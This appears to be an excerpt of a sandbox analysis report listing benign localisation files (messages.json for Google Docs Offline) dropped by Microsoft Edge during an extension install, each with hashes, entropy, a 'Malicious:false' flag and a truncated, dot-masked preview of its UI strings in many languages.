                                                                                                                                                                                                                                                                                                  SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                  SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                  SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1065
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                  MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                  SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                  SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                  SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2771
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                  MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                  SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                  SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                  SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):858
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                  MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                  SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                  SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                  SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):954
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                  MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                  SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                  SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                  SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):899
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                  MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                  SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                  SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                  SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2230
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                  MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                  SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                  SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                  SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1160
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                  MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                  SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                  SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                  SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3264
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                  MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                  SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                  SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                  SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3235
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                  MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                  SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                  SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                  SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3122
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                  MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                  SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                  SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                  SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1895
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                  MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                  SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                  SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                  SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1042
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                  MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                  SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                  SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                  SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
